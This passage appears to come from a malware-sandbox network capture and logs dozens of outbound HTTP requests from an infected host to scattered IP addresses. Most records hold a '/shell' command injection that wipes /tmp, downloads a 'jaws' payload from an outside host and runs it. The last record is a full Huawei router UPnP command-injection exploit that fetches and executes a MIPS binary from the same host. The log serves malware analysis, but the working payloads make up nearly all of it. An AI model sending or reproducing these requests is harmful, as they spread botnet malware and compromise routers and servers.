                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    579192.168.2.235468437.201.193.12180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245385885 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    580192.168.2.2359018219.119.143.8480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245426893 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    581192.168.2.2341602104.124.188.9480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245456934 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    582192.168.2.234213642.133.131.18180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245497942 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    583192.168.2.2341354122.96.155.14280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245549917 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    584192.168.2.2352106165.160.100.18480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245577097 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    585192.168.2.234963413.25.240.2480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245630026 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    586192.168.2.23495948.18.108.12480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245719910 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    587192.168.2.235908663.169.38.1480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245784044 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    588192.168.2.2352912118.247.151.8380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245946884 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    589192.168.2.2339866119.181.107.10280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.245976925 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    590192.168.2.233545287.238.251.10280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246059895 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    591192.168.2.2337370198.54.147.24880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246140957 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    592192.168.2.235826892.66.196.1780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246171951 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    593192.168.2.234793852.6.122.21280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246217966 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    594192.168.2.233279673.230.71.2680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246253967 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    595192.168.2.234869842.99.218.1280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246300936 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    596192.168.2.2347646108.218.98.17380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246355057 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    597192.168.2.2333772141.114.69.13880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246393919 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    598192.168.2.2354018115.7.126.9480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246424913 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    599192.168.2.235095672.8.191.1880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246473074 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    600192.168.2.2352478172.189.208.19780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246505022 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    601192.168.2.234026039.154.44.11380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246557951 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    602192.168.2.233508283.217.140.180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246669054 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    603192.168.2.235551627.184.243.15880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246696949 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    604192.168.2.2337954183.59.59.22280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246747971 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    605192.168.2.234238858.54.35.20480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246777058 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    606192.168.2.234389638.25.43.16180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246812105 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    607192.168.2.234941286.86.105.4080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246876001 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    608192.168.2.2335964117.183.217.7980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246905088 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    609192.168.2.2348018146.123.63.9380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246953011 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    610192.168.2.2357912133.6.1.5280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.246983051 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    611192.168.2.235350052.63.251.9580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.247051001 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    612192.168.2.23451542.239.207.13580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254179955 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    613192.168.2.234664864.170.221.23780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254225016 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    614192.168.2.2334994168.145.45.2680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254554987 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    615192.168.2.2351930188.65.236.4980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254604101 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    616192.168.2.233471647.229.128.1180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254679918 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    617192.168.2.234257636.18.192.9980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254703045 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    618192.168.2.2339154195.190.120.9680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254790068 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    619192.168.2.2350144109.252.239.25080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254839897 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    620192.168.2.235905051.132.195.23680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254885912 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    621192.168.2.2355984103.40.87.1680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254930019 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    622192.168.2.2358512188.86.168.16080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.254966021 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    623192.168.2.2355288135.144.55.3780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.255002022 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    624192.168.2.2332818158.200.167.19180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.255179882 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    625192.168.2.234409298.147.145.18580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.255230904 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    626192.168.2.234771287.44.98.22380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.255250931 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    627192.168.2.2351122112.77.116.12280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.255296946 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    628192.168.2.2343720176.135.116.13980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.255398035 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    629192.168.2.235051080.104.124.10280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.255440950 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    630192.168.2.23394208.213.71.17780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287003994 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    631192.168.2.2346430190.51.59.6980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287101984 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    632192.168.2.2347654194.252.67.1980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287130117 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    633192.168.2.2347844129.88.154.12280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287347078 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    634192.168.2.234074086.99.246.15080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287440062 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    635192.168.2.2354832197.91.191.23137215
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:56.287839890 CEST880OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                    Content-Length: 430
                    Connection: keep-alive
                    Accept: */*
                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 [TRUNCATED]
                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
